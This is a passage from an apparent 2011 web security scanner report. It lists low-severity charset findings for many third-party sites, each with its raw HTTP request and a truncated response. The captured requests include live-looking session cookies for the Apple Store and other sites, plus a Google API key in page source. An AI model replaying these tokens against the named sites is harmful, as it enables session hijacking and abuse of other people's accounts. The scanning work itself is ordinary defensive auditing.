HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 22:06:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...

29.32. http://managedq.com/search.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://managedq.com
Path:   /search.php

Request

GET /search.php HTTP/1.1
Host: managedq.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:32 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 13502
Connection: close
Content-Type: text/html


<head>
   <base href="http://managedq.com/">    
<script src="http://www.google.com/jsapi?key=ABQIAAAAfY9R5yZEX7c7fNMc_53H-RSS93VGBhy0VH-F4ConCm_atGP3gxQMWmXfPasKYusJ-dKLng0cAOqm0g" type="text/javascri
...[SNIP]...

29.33. http://sales.liveperson.net/visitor/liveperson/chat-button/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/liveperson/chat-button/

Request

GET /visitor/liveperson/chat-button/ HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 403 Forbidden
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 17:52:32 GMT
Connection: close

<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</b
...[SNIP]...

29.34. http://sr2.liveperson.net/visitor/addons/deploy.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sr2.liveperson.net
Path:   /visitor/addons/deploy.asp

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sr2.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LivePersonID=LP i=16101423669632,d=1294435351;

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 403
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: private, max-age=86400
Date: Thu, 03 Feb 2011 17:52:34 GMT
Connection: close

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>
<p>
<font face="Arial
...[SNIP]...

29.35. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0

Request

GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.1.5.3.1.0.0 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 500 Apple
Date: Thu, 03 Feb 2011 18:11:08 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
content-length: 38
Connection: close
Content-Type: text/html
x-frame-options: sameorigin

An Internal Server Error Has Occurred.

29.36. https://store.apple.com/Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13

Request

GET /Apple/WebObjects/OrderStatus.woa/5134007/wo/ZB4oWsbh0bCLk6bYCPyBtM/0.2.1.0.0.0.29.1.5.15.7.13 HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 500 Apple
Date: Thu, 03 Feb 2011 18:11:13 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
content-length: 38
Connection: close
Content-Type: text/html
x-frame-options: sameorigin

An Internal Server Error Has Occurred.

29.37. https://store.apple.com/Catalog/US/Images/ordernumberinfo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.apple.com
Path:   /Catalog/US/Images/ordernumberinfo.html

Request

GET /Catalog/US/Images/ordernumberinfo.html HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=ipod%20-%20accessories%20(us);

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 19 Apr 2005 01:04:20 GMT
content-type: text/html
Date: Thu, 03 Feb 2011 18:11:50 GMT
x-request-id: 83fda341-088c-44bc-8435-0e4196791bc1
Content-Length: 2369
ETag: "103d4a-941-42645914"
Accept-Ranges: bytes
x-frame-options: sameorigin

<HTML>
<HEAD>
<TITLE>
The Apple Store (U.S.)
</TITLE>
<link rel="stylesheet" type="text/css" href="http://www.apple.com/main/css/fonts.css" title="fonts">
<script language ="JavaScript" >
<!--
window.
...[SNIP]...

29.38. http://telecommunications.jobs.net/Michigan.htm/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telecommunications.jobs.net
Path:   /Michigan.htm/x22

Request

GET /Michigan.htm/x22 HTTP/1.1
Host: telecommunications.jobs.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 20:30:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 58
Content-Type: text/html
Cache-control: private

<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>

29.39. https://redcated/iaction/00asup_RetargetingSecure_1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://redcated
Path:   /iaction/00asup_RetargetingSecure_1

Request

GET /iaction/00asup_RetargetingSecure_1 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 407
Content-Type: text/html
Expires: 0
Date: Thu, 03 Feb 2011 19:19:31 GMT
Connection: close

<html><body><img src="https://a248.e.akamai.net/img.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="https://ad.bizo.com/pixel?id=175863&t=2" width="1" height="1" border="0" /><
...[SNIP]...

29.40. https://redcated/iaction/00asup_SigninbuttonPage_10  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://redcated
Path:   /iaction/00asup_SigninbuttonPage_10

Request

GET /iaction/00asup_SigninbuttonPage_10 HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 227
Content-Type: text/html
Expires: 0
Date: Thu, 03 Feb 2011 19:50:13 GMT
Connection: close

<html><body><img src="https://a248.e.akamai.net/img.redcated/images/pixel.gif" width="1" height="1" border="0" /><img src="https://uat.netmng.com/pixel/?aid=148&tax=sign_button" width="1" height="1"
...[SNIP]...

29.41. http://www.city-data.com/zips/48083.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.city-data.com
Path:   /zips/48083.html/x22

Request

GET /zips/48083.html/x22 HTTP/1.1
Host: www.city-data.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:49 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 154951

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>48083 Zip Code (Troy, Michigan) Profile - homes, apartments, schools, po
...[SNIP]...

29.42. http://www.expertrating.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expertrating.com
Path:   /

Request

GET / HTTP/1.1
Host: www.expertrating.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34238
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAAATSB=HNEHKCKAPEKPJKCMAAKCHOBB; path=/
Cache-control: private


<html>
<head>
<meta HTTP-EQUIV="Expires" CONTENT="Wed, 10 Jan 2000 01:01:01 GMT">
<meta name="keywords" content="Online certification, Pre employment testing, Online courses, Online testing, Sk
...[SNIP]...

29.43. http://www.facebook.com/share.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /share.php

Request

GET /share.php?u=http://ir.supermedia.com/index.cfm?&t=SuperMedia - Investor Relations HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Connection: close
Date: Thu, 03 Feb 2011 19:19:41 GMT
Content-Length: 134

<HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY>
<H1>Method Not Implemented</H1>
Invalid method in request<P>
</BODY></HTML>

29.44. http://www.forlocations.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forlocations.com
Path:   /

Request

GET / HTTP/1.1
Host: www.forlocations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:55:18 GMT
Server: Apache/2
Last-Modified: Sun, 16 Jan 2011 22:34:11 GMT
ETag: "1995423-29b6-499fe44271ec0"
Accept-Ranges: bytes
Content-Length: 10678
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<html>
<head>
   <title>Find Locations</title>
<link rel="stylesheet" href="css/css.css" type="text/css" />
</head>
<body bgcolor="#3c3c3c">
<table background="images/headslice.png" width="1000" height=
...[SNIP]...

29.45. http://www.jobs.net/Michigan.htm/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobs.net
Path:   /Michigan.htm/x26amp

Request

GET /Michigan.htm/x26amp HTTP/1.1
Host: www.jobs.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Thu, 03 Feb 2011 21:57:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 58
Content-Type: text/html
Cache-control: private

<html><body><h1> HTTP/1.1 404 Not Found</h1></body></html>

29.46. http://www.lights.ca/publisher/db/2/5952.html/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lights.ca
Path:   /publisher/db/2/5952.html/x22

Request

GET /publisher/db/2/5952.html/x22 HTTP/1.1
Host: www.lights.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:00:05 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Content-Length: 4835
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN//3.2">
<HTML>
<HEAD>
<TITLE>Publishers' Catalogue Home Page - Error page</TITLE>
<LINK rel = STYLESHEET href = "/publisher/stylesheetmain.css" Type
= "text
...[SNIP]...

29.47. http://www.lwis.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lwis.net
Path:   /

Request

GET / HTTP/1.1
Host: www.lwis.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:50:24 GMT
Server: Apache
Last-Modified: Sun, 26 Sep 2010 16:52:45 GMT
ETag: "5914026-2c9-4c9f7a5d"
Accept-Ranges: bytes
Content-Length: 713
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<title>LWIS.NET - Highly Qualified Web Development</title>
<meta charset="utf-8" />
<meta name="description" content="Live Web Institute (lwis.net)
...[SNIP]...

29.48. http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thesfmarathon.com
Path:   /wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php

Request

GET /wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php HTTP/1.1
Host: www.thesfmarathon.com
Proxy-Connection: keep-alive
Referer: http://www.thesfmarathon.com/wp-content/plugins/forum-server/fs-admin/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 14:17:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_bwlimited/1.4 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Content-Length: 212
Content-Type: text/html

<br />
<b>Fatal error</b>: Call to a member function get_usergroup_name() on a non-object in <b>/home/tsfm/public_html/wp-content/plugins/forum-server/fs-admin/wpf-usergroup-edit.php</b> on line <b>2
...[SNIP]...

29.49. http://www.tucows.com/videoegg/ad.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /videoegg/ad.html

Request

GET /videoegg/ad.html HTTP/1.1
Host: www.tucows.com
Proxy-Connection: keep-alive
Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:51:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 923

<html>
<head></head>
<body>
<script>
var config = {};
var am;
var hash = window.location.hash;
if (hash != null) {
var str = unescape(unescape(hash));
   str = str.substring(2);
str =
...[SNIP]...

29.50. http://www.wugnet.com/shareware/spow.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wugnet.com
Path:   /shareware/spow.asp

Request

GET /shareware/spow.asp HTTP/1.1
Host: www.wugnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 20:36:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQSBTTD=KPNKCKPAPFNMPLDOKMGFDEND; path=/
Cache-control: private

<a href='/'>WUGNET Home</a>

30. HTML uses unrecognised charset  previous  next
There are 2 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


30.1. http://store.apple.com/Catalog/US/Images/intlstoreroutingpage.html  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://store.apple.com
Path:   /Catalog/US/Images/intlstoreroutingpage.html

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /Catalog/US/Images/intlstoreroutingpage.html HTTP/1.1
Host: store.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; geo=US; wosid=MqFbJfPVEePp2gNcNwF5ct0BU7b; s_sq=appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=60%2C60%2C1012%2C; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_ria=Flash%2010%7C; s_orientationHeight=1012; asbid=sUA9UFFFKPYUDFPTX; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; woinst=920064012; s_cc=true; asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; 